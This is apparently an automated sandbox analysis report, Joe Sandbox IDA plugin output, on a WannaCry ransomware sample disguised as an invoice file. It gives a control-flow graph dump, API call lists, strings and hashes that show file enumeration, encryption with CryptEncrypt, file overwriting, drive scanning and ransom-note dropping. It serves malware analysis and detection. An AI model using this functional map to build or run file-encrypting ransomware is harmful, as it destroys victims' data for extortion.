wcsstr 1949->1950 1951 100032ef 1949->1951 1950->1951 1952 10003300 _wcsicmp 1951->1952 1953 100033b9 _wcsicmp 1951->1953 1954 10003312 1952->1954 1955 1000331d _wcsicmp 1952->1955 1956 100033d7 _wcsicmp 1953->1956 1957 100033cc 1953->1957 1954->1888 1960 10003337 _wcsicmp 1955->1960 1961 1000332c 1955->1961 1958 100033f1 _wcsicmp 1956->1958 1959 100033e6 1956->1959 1957->1888 1958->1888 1959->1888 1962 10003351 _wcsicmp 1960->1962 1963 10003346 1960->1963 1961->1888 1964 10003360 1962->1964 1965 1000336b _wcsicmp 1962->1965 1963->1888 1964->1888 1966 10003385 wcsstr 1965->1966 1967 1000337a 1965->1967 1968 10003394 1966->1968 1969 1000339f wcsstr 1966->1969 1967->1888 1968->1888 1969->1953 1970 100033ae 1969->1970 1970->1888 1972 100035df 1971->1972 2011 10003810 1972->2011 1974 10002508 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 1974->1882 1975->1901 1976->1905 1977->1905 1979 1000371a 1978->1979 1982 100036b0 1978->1982 1979->1876 1980 100036ec ??3@YAXPAX 1980->1982 1983 1000370d 1980->1983 1981 100036e0 ??3@YAXPAX 1981->1980 1982->1980 1982->1981 1983->1876 1985 100037d1 ??3@YAXPAX 1984->1985 1986 100023ff ??3@YAXPAX 1984->1986 1985->1985 1985->1986 1986->1880 1988 10002d79 1987->1988 1989 10002d7f _wcsicmp 1987->1989 1988->1888 1990 10002d98 _wcsicmp 1989->1990 1991 10002e5b 1989->1991 1990->1991 1992 10002dab _wcsicmp 1990->1992 1991->1888 1993 10002dc5 1992->1993 1994 10002dba 1992->1994 1995 10002dd3 _wcsicmp 1993->1995 1996 10002dea 1993->1996 1994->1888 1995->1993 1997 10002e11 1995->1997 1998 10002e27 _wcsicmp 1996->1998 1999 10002df8 _wcsicmp 1996->1999 2003 10002e0f 1996->2003 1997->1888 2001 10002e41 _wcsicmp 1998->2001 2002 10002e36 1998->2002 1999->1996 2000 10002e1c 1999->2000 2000->1888 2001->1888 2002->1888 2003->1998 2005 1000377f 2004->2005 2005->1882 2007 10003660 ??3@YAXPAX 2006->2007 2008 10003641 2006->2008 2007->1893 2009 10003654 ??3@YAXPAX 2008->2009 2010 1000364d 2008->2010 2009->2007 2010->2007 2012 
10003840 2011->2012 2017 10003944 2011->2017 2013 10003868 2012->2013 2019 100038db 2012->2019 2015 10003874 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 2013->2015 2016 1000386e ?_Xran@std@ 2013->2016 2014 10003935 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 2014->2017 2020 10003885 2015->2020 2016->2015 2017->1974 2018 100038c0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 2018->1974 2019->2014 2021 100038f5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 2019->2021 2020->2018 2022 100038a1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 2020->2022 2023 10003906 2021->2023 2022->2018 2024 100038b7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 2022->2024 2023->1974 2024->2018 2026 1000227a swprintf 2025->2026 2027 1000221a wcscpy wcsrchr 2025->2027 2030 1000229a GetFileAttributesW 2026->2030 2028 10002265 2027->2028 2029 10002245 _wcsicmp 2027->2029 2032 1000226f wcscat 2028->2032 2031 1000225e wcscpy 2029->2031 2029->2032 2033 100022d8 2030->2033 2034 100022aa 2030->2034 2031->2030 2032->2030 2036 100022e7 2033->2036 2038 10002ba0 29 API calls 2033->2038 2040 10001960 2034->2040 2036->1924 2037 100022ba 2037->2033 2039 100022be DeleteFileW 2037->2039 2038->2036 2039->1924 2041 10001a12 CreateFileW 2040->2041 2042 10001a07 2040->2042 2043 10001a74 GetFileSizeEx 2041->2043 2044 10001a34 2041->2044 2042->2041 2045 10001a91 GetFileTime ReadFile 2043->2045 2046 10001a86 2043->2046 2044->2046 2052 10001a48 CreateFileW 2044->2052 2048 10001b98 SetFilePointer 2045->2048 2049 10001ace 2045->2049 2047 1000208e _local_unwind2 2046->2047 2047->2037 2050 10001bb7 swprintf CreateFileW 2048->2050 2051 10001c5b ReadFile 2048->2051 2049->2048 2053 10001ae8 ReadFile 2049->2053 2054 10001c01 CreateFileW 2050->2054 2063 10001c38 2050->2063 2051->2046 2056 10001c7f 2051->2056 2052->2043 2055 10001a6a 2052->2055 2053->2048 
2057 10001b0e 2053->2057 2054->2046 2054->2063 2055->2047 2056->2046 2058 10001c8f SetFilePointer WriteFile 2056->2058 2057->2048 2059 10001b22 ReadFile 2057->2059 2058->2046 2061 10001cbc 2058->2061 2059->2048 2062 10001b44 ReadFile 2059->2062 2060 10001d66 2098 10004370 2060->2098 2061->2046 2065 10001ccc SetFilePointer WriteFile 2061->2065 2062->2048 2067 10001b67 2062->2067 2063->2060 2071 10001d54 rand 2063->2071 2065->2046 2066 10001d09 2065->2066 2066->2046 2069 10001d19 SetFilePointer 2066->2069 2067->2048 2070 10001b72 _local_unwind2 2067->2070 2068 10001dba 2068->2046 2107 10005dc0 2068->2107 2069->2063 2070->2037 2071->2060 2073 10001de3 WriteFile 2073->2046 2075 10001e30 WriteFile 2073->2075 2075->2046 2076 10001e51 WriteFile 2075->2076 2076->2046 2077 10001e77 WriteFile 2076->2077 2077->2046 2078 10001e95 WriteFile 2077->2078 2078->2046 2079 10001eb6 2078->2079 2080 100020b7 SetFileTime 2079->2080 2083 10001ee5 SetFilePointer ReadFile 2079->2083 2093 10001f9b 2079->2093 2081 10002130 CloseHandle MoveFileW 2080->2081 2082 100020da FindCloseChangeNotification CloseHandle MoveFileW 2080->2082 2087 10002158 _local_unwind2 2081->2087 2085 10002110 SetFileAttributesW 2082->2085 2086 10002121 DeleteFileW 2082->2086 2083->2046 2088 10001f19 2083->2088 2084 100020ab 2084->2080 2085->2087 2086->2087 2087->2037 2088->2046 2091 10006940 12 API calls 2088->2091 2090 10001fcc ReadFile 2090->2046 2090->2093 2092 10001f46 WriteFile 2091->2092 2092->2046 2094 10001f6a 2092->2094 2093->2046 2093->2084 2093->2090 2114 10006940 2093->2114 2094->2046 2095 10001f7a SetFilePointer 2094->2095 2095->2093 2099 10004386 2098->2099 2100 1000437d 2098->2100 2127 10004420 CryptGenRandom 2099->2127 2100->2068 2102 10004397 2103 1000439b 2102->2103 2104 100043b2 EnterCriticalSection CryptEncrypt 2102->2104 2103->2068 2105 10004401 LeaveCriticalSection 2104->2105 2106 100043f2 LeaveCriticalSection 2104->2106 2105->2103 2106->2068 2108 10005df4 2107->2108 2109 10005dce 
??0exception@@QAE@ABQBD _CxxThrowException 2107->2109 2110 10005e2d 2108->2110 2111 10005e07 ??0exception@@QAE@ABQBD _CxxThrowException 2108->2111 2109->2108 2112 10005e40 ??0exception@@QAE@ABQBD _CxxThrowException 2110->2112 2113 10005e66 2110->2113 2111->2110 2112->2113 2113->2073 2113->2113 2115 10006950 ??0exception@@QAE@ABQBD _CxxThrowException 2114->2115 2116 1000696e 2114->2116 2115->2116 2117 10006b7c ??0exception@@QAE@ABQBD _CxxThrowException 2116->2117 2125 10006990 2116->2125 2118 10006b34 2119 10006640 4 API calls 2118->2119 2126 1000205a WriteFile 2118->2126 2119->2118 2120 10006640 4 API calls 2122 10006a69 2120->2122 2121 10006a4b ??0exception@@QAE@ABQBD _CxxThrowException 2121->2122 2122->2118 2122->2120 2124 10006b16 ??0exception@@QAE@ABQBD _CxxThrowException 2122->2124 2122->2126 2124->2118 2125->2121 2125->2122 2125->2125 2125->2126 2128 10006640 2125->2128 2126->2046 2126->2093 2127->2102 2129 10006650 ??0exception@@QAE@ABQBD _CxxThrowException 2128->2129 2130 1000666e 2128->2130 2129->2130 2133 10006694 2130->2133 2134 10006280 2130->2134 2133->2125 2135 10006291 ??0exception@@QAE@ABQBD _CxxThrowException 2134->2135 2136 100062af 2134->2136 2135->2136 2136->2125 2138 10006bd0 2137->2138 2139 1000301a GetFileAttributesW 2138->2139 2140 10003030 2139->2140 2141 1000303c 2139->2141 2140->1936 2142 10003040 SetFileAttributesW 2141->2142 2143 1000304a CreateFileW 2141->2143 2142->2143 2144 100030a3 GetFileSizeEx 2143->2144 2145 10003066 2143->2145 2146 100030bf 2144->2146 2150 100030ea 2144->2150 2147 10003073 2145->2147 2148 1000307d CreateFileW 2145->2148 2158 10004420 CryptGenRandom 2146->2158 2147->1936 2148->2144 2149 10003097 2148->2149 2149->1936 2152 10003161 2150->2152 2153 10003142 SetFilePointer 2150->2153 2154 1000316e WriteFile FlushFileBuffers SetFilePointer 2152->2154 2153->2154 2155 100031e9 FindCloseChangeNotification 2154->2155 2157 10003195 2154->2157 2155->1936 2156 100031ba WriteFile 2156->2157 2157->2155 2157->2156 2158->2150 
2162 10005060 GetWindowsDirectoryW 2159->2162 2161 10005150 swprintf DeleteFileW 2161->1788 2163 100050d0 swprintf CreateDirectoryW sprintf 2162->2163 2164 1000508e GetTempPathW wcslen 2162->2164 2167 10001080 6 API calls 2163->2167 2165 10005115 2164->2165 2166 100050aa wcslen 2164->2166 2165->2161 2166->2165 2168 100050b8 wcslen 2166->2168 2169 10005112 2167->2169 2168->2161 2169->2165 2170->1813 2172 10003bb0 3 API calls 2171->2172 2173 1000176c 2172->2173 2174 10003bb0 3 API calls 2173->2174 2175 10001774 2174->2175 2176 100017a3 2175->2176 2180 10001790 GlobalFree 2175->2180 2177 100017cc 2176->2177 2181 100017b9 GlobalFree 2176->2181 2178 10001800 DeleteCriticalSection wcslen 2177->2178 2179 100017d6 WaitForSingleObject CloseHandle 2177->2179 2182 10001821 DeleteFileW 2178->2182 2183 100016b2 2178->2183 2179->2178 2180->2176 2181->2177 2182->2183 2183->1826 2183->1827 2184->1831 2185->1833 2187 100045cc 2186->2187 2188 10004500 21 API calls 2187->2188 2189 100045e7 ExitThread 2187->2189 2190 100045de Sleep 2187->2190 2188->2187 2190->2187 2192 100047da ExitThread 2191->2192 2193 1000479c 2191->2193 2193->2192 2194 100047a8 time 2193->2194 2196 100047c4 Sleep 2193->2196 2195 10004730 3 API calls 2194->2195 2195->2193 2196->2193 2198 100049a6 time 2197->2198 2199 10004a24 Sleep 2198->2199 2203 100049b7 2198->2203 2199->2198 2200 100049c6 time 2201 10001000 5 API calls 2200->2201 2201->2203 2203->2199 2203->2200 2204 100049eb GetFullPathNameA 2203->2204 2219 10004890 2203->2219 2228 100047f0 2204->2228 2207 10005745 Sleep GetLogicalDrives 2206->2207 2208 100057af ExitThread 2206->2208 2209 10005760 2207->2209 2209->2207 2209->2208 2210 10005781 CreateThread 2209->2210 2210->2209 2211 10005799 CloseHandle 2210->2211 2249 10005680 2210->2249 2211->2209 2213 10005337 2212->2213 2214 10005309 2212->2214 2215 10001080 6 API calls 2214->2215 2216 1000531e Sleep 2215->2216 2216->2214 2217 10005331 2216->2217 2235 10001360 AllocateAndInitializeSid 2219->2235 2221 
1000489c 2222 100048a9 GetFullPathNameA sprintf 2221->2222 2223 10004913 CreateProcessA 2221->2223 2224 10001080 6 API calls 2222->2224 2226 10004969 CloseHandle CloseHandle 2223->2226 2227 1000497f 2223->2227 2225 10004907 2224->2225 2225->2223 2225->2227 2226->2227 2227->2203 2229 10001360 3 API calls 2228->2229 2230 10004810 2229->2230 2240 100014a0 GetComputerNameW wcslen 2230->2240 2233 10001080 6 API calls 2234 1000487d 2233->2234 2234->2203 2236 100013a6 2235->2236 2237 100013ab CheckTokenMembership 2235->2237 2236->2221 2238 100013c0 2237->2238 2239 100013c4 FreeSid 2237->2239 2238->2239 2239->2221 2241 10001517 srand rand 2240->2241 2242 100014f7 2240->2242 2244 10001533 2241->2244 2243 100014fb wcslen 2242->2243 2243->2241 2243->2243 2245 10001548 rand 2244->2245 2246 1000155d 2244->2246 2245->2245 2245->2246 2247 10001564 rand 2246->2247 2248 10001579 sprintf 2246->2248 2247->2247 2247->2248 2248->2233 2250 10001590 2 API calls 2249->2250 2251 100056a4 2250->2251 2252 10001830 57 API calls 2251->2252 2253 100056c7 2252->2253 2254 100056f8 2253->2254 2255 100056cb 2253->2255 2257 10005540 191 API calls 2254->2257 2256 10001680 14 API calls 2255->2256 2258 100056df 2256->2258 2259 1000570d 2257->2259 2260 10005190 29 API calls 2259->2260 2261 10005713 2260->2261 2262 10001760 10 API calls 2261->2262 2263 1000571f ExitThread 2262->2263 2281 10003500 2282 10003543 ??3@YAXPAX 2281->2282 2283 1000350f 2281->2283 2284 10003510 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 2283->2284 2284->2284 2285 10003542 2284->2285 2285->2282 2302 10003a40 2307 10003a60 DeleteCriticalSection 2302->2307 2304 10003a48 2305 10003a58 2304->2305 2306 10003a4f ??3@YAXPAX 2304->2306 2306->2305 2307->2304 2324 10003560 2325 10003595 ??3@YAXPAX 2324->2325 2326 1000356e ??3@YAXPAX 2324->2326 2326->2325 2326->2326 2327 10001660 2328 10001680 14 API calls 2327->2328 2329 10001668 2328->2329 2330 10001678 2329->2330 2331 1000166f ??3@YAXPAX 
2329->2331 2331->2330 2294 10005727 2295 10005730 GetLogicalDrives 2294->2295 2296 10005745 Sleep GetLogicalDrives 2295->2296 2297 100057af ExitThread 2295->2297 2298 10005760 2296->2298 2298->2296 2298->2297 2299 10005781 CreateThread 2298->2299 2299->2298 2300 10005799 CloseHandle 2299->2300 2301 10005680 277 API calls 2299->2301 2300->2298 2274 100021ac 2275 100021b7 CloseHandle 2274->2275 2276 100021be 2274->2276 2275->2276 2277 100021d4 wcslen 2276->2277 2278 100021cd CloseHandle 2276->2278 2279 100021f5 2277->2279 2280 100021e8 DeleteFileW 2277->2280 2278->2277 2280->2279 2286 10006c0c ??1type_info@@UAE 2287 10006c22 2286->2287 2288 10006c1b ??3@YAXPAX 2286->2288 2288->2287 2264 100053f0 GetUserNameW _wcsicmp 2265 10005452 2264->2265 2266 10005444 2264->2266 2267 100027f0 168 API calls 2265->2267 2268 10005468 2267->2268 2289 10005d90 2290 10005d98 2289->2290 2291 10005da8 2290->2291 2292 10005d9f ??3@YAXPAX 2290->2292 2292->2291 2332 10006ef0 ??3@YAXPAX 2269 10003ff3 2270 10004001 2269->2270 2271 10003ffa GlobalFree 2269->2271 2272 10004010 2270->2272 2273 10004009 FindCloseChangeNotification 2270->2273 2271->2270 2273->2272 2293 10006e16 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 2309 10006cdf 2311 10006cfb 2309->2311 2313 10006cf2 2309->2313 2311->2313 2316 10006d23 2311->2316 2317 10006c34 2311->2317 2312 10006d43 2315 10006c34 3 API calls 2312->2315 2312->2316 2313->2312 2314 10006c34 3 API calls 2313->2314 2313->2316 2314->2312 2315->2316 2318 10006c3c 2317->2318 2319 10006c5d malloc 2318->2319 2320 10006c72 2318->2320 2322 10006c9c 2318->2322 2319->2320 2321 10006c76 _initterm 2319->2321 2320->2313 2321->2320 2322->2320 2323 10006cc9 free 2322->2323 2323->2320

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
[Figure: control-flow graph for the function at 10001960]
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?), ref: 10001A21
                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?), ref: 10001A57
                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
                                                            • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
                                                            • ReadFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?), ref: 10001AC0
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 10001B00
                                                            • ReadFile.KERNEL32(?,?,?,?,00000000,?,?), ref: 10001B3A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 10001B5D
                                                            • _local_unwind2.MSVCRT ref: 10001B78
                                                            • _local_unwind2.MSVCRT ref: 1000208E
                                                            • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?), ref: 100020DA
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 100020E1
                                                            • MoveFileW.KERNEL32(?,?), ref: 10002101
                                                            • SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
                                                            • DeleteFileW.KERNEL32(?,?,?), ref: 10002128
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 10002130
                                                            • MoveFileW.KERNEL32(?,?), ref: 1000214D
                                                            • _local_unwind2.MSVCRT ref: 1000218F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$Read$Close_local_unwind2$CreateHandleMoveTime$AttributesChangeDeleteFindNotificationSize
                                                            • String ID: %s%s$WANACRY!
                                                            • API String ID: 2042663167-3951969912
                                                            • Opcode ID: 23b110fa1eaf302a1690ae2ada5f59b11b6c089050db00894cddd4ed701fb794
                                                            • Instruction ID: 1cd18d78d3b1adc01fd8983c6b1e49359ce7f15159302df972715ebca2b9e78f
                                                            • Opcode Fuzzy Hash: 23b110fa1eaf302a1690ae2ada5f59b11b6c089050db00894cddd4ed701fb794
                                                            • Instruction Fuzzy Hash: DE326571A41229ABEB25DF54CC85FEA73B8FB48790F0042A9F619A7184D7709E84CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 10002332
                                                              • Part of subcall function 10003730: ??2@YAPAXI@Z.MSVCRT ref: 10003732
                                                            • swprintf.MSVCRT ref: 10002388
                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100023D2
                                                              • Part of subcall function 100037C0: ??3@YAXPAX@Z.MSVCRT ref: 100037E5
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002404
                                                            • wcscmp.MSVCRT ref: 10002442
                                                            • wcscmp.MSVCRT ref: 10002459
                                                            • swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
                                                            • wcslen.MSVCRT ref: 100024CC
                                                            • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
                                                            • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
                                                            • FindNextFileW.KERNELBASE(?,?), ref: 10002634
                                                            • FindClose.KERNELBASE(?), ref: 10002643
                                                              • Part of subcall function 100036A0: ??3@YAXPAX@Z.MSVCRT ref: 100036F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??3@$FindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??2@FileTidy@?$basic_string@swprintfwcscmp$?assign@?$basic_string@CloseFirstNextV12@wcslen
                                                            • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                            • API String ID: 3909534679-268640142
                                                            • Opcode ID: 8e91527c5bf5cb74e5efc59b8c6c131fb9f7429ce5b3cab5469d33bef72cfbd8
                                                            • Instruction ID: de254d0e5b2da72f41e6c310beb378338d29d9cbc8abb0440bfd0675c5201551
                                                            • Opcode Fuzzy Hash: 8e91527c5bf5cb74e5efc59b8c6c131fb9f7429ce5b3cab5469d33bef72cfbd8
                                                            • Instruction Fuzzy Hash: 38D1B1755083819FE720DB64C880AABB7E8FFC9384F10491DF99983255EB75E909CB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,7598A390,7633DC30,75AA2EE0,?), ref: 10004A97
                                                            • wcslen.MSVCRT ref: 10004A9E
                                                            • wcsrchr.MSVCRT ref: 10004AC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: FolderPathwcslenwcsrchr
                                                            • String ID: %s\%s\%s$%s\*.*
                                                            • API String ID: 546322749-1899009126
                                                            • Opcode ID: 8a6f2f974920d52717d03da3a36b72289499b9d186961dda4ecc416d09510b88
                                                            • Instruction ID: f3627253bfd0e675d6c72d42cf14d2781f3e5a035430ee9dadabd35bed43a83c
                                                            • Opcode Fuzzy Hash: 8a6f2f974920d52717d03da3a36b72289499b9d186961dda4ecc416d09510b88
                                                            • Instruction Fuzzy Hash: 4761D8B2504345ABF320DB64DC88FEB73E8FFC4395F01492DEA8982144EB75A509C7A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetDriveTypeW.KERNELBASE(00000000,00000001,00000000,00000000), ref: 100051C0
                                                            • GlobalAlloc.KERNELBASE(00000000,00A00000), ref: 100051D6
                                                              • Part of subcall function 10005120: swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
                                                              • Part of subcall function 10005120: DeleteFileW.KERNELBASE(?), ref: 10005174
                                                            • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
                                                            • GlobalFree.KERNEL32(00000000), ref: 1000523A
                                                            • MoveFileExW.KERNELBASE(?,00000000,00000004,75AA3300), ref: 10005254
                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,?,?,?), ref: 1000527D
                                                            • WriteFile.KERNELBASE(00000000,00000000,00A00000,?,00000000), ref: 100052A9
                                                            • Sleep.KERNELBASE(0000000A), ref: 100052B5
                                                            • Sleep.KERNELBASE(00002710), ref: 100052C2
                                                            • GlobalFree.KERNEL32(00000000), ref: 100052CE
                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
                                                            • CloseHandle.KERNEL32(00000000), ref: 100052DC
                                                            • DeleteFileW.KERNEL32(?), ref: 100052E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: File$FreeGlobal$DeleteSleep$AllocBuffersCloseCreateDiskDriveFlushHandleMoveSpaceTypeWriteswprintf
                                                            • String ID: :\$UUUU
                                                            • API String ID: 3329057766-2502105546
                                                            • Opcode ID: b42e683e316584ab492aa5f58972f8961f4bf75bae1380fa580a2c89d59e7ee4
                                                            • Instruction ID: c3553bfb2ce832e5e524584dfb39294b6681cea42b2672b67cd9b1e4f92b37f1
                                                            • Opcode Fuzzy Hash: b42e683e316584ab492aa5f58972f8961f4bf75bae1380fa580a2c89d59e7ee4
                                                            • Instruction Fuzzy Hash: 6241A031604311ABF300EB64DC89FAF77E9FF85791F100A29FA45861D4EB79E9488762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 100011E4
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10001214
                                                            • GetLastError.KERNEL32 ref: 1000121A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$CurrentErrorInformationLastOpen
                                                            • String ID: ConvertSidToStringSidW$advapi32.dll
                                                            • API String ID: 3761956567-1399820460
                                                            • Opcode ID: 303a435fe0c47bc2ab0ad51a806ed00c7655853782dcd7968111a56573c8e81e
                                                            • Instruction ID: 47968a519e593bd1c62a1f3d62b818a3899146cc2fa57af3534c2703d8e63c9f
                                                            • Opcode Fuzzy Hash: 303a435fe0c47bc2ab0ad51a806ed00c7655853782dcd7968111a56573c8e81e
                                                            • Instruction Fuzzy Hash: 2121C375A00212ABE300DB28EC85FEB37E8FFC06D5F404929F948C2158E374D94986A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 10004F7C
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 10004F99
                                                            • CopyFileW.KERNELBASE(?,?,00000000), ref: 10004FB4
                                                            • GetUserNameW.ADVAPI32 ref: 10004FF0
                                                            • _wcsicmp.MSVCRT ref: 10005006
                                                            • KiUserCallbackDispatcher.NTDLL(00000014,00000000,?,00000001), ref: 1000501E
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 10005034
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe,?,00000000), ref: 10005045
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CopyFileUserswprintf$ByteCallbackCharDispatcherMultiNameWide_wcsicmp
                                                            • String ID: %s\%s$@WanaDecryptor@.bmp$@WanaDecryptor@.exe$b.wnry
                                                            • API String ID: 2267108377-163098832
                                                            • Opcode ID: bf392daa0d3de960360cd3c4300729d8e512d5ebde27cbd7410bd1becd215d1f
                                                            • Instruction ID: e55c92b8c82600a83f2bc68813337d3839c0dc3b58a337792abbc0111089e87c
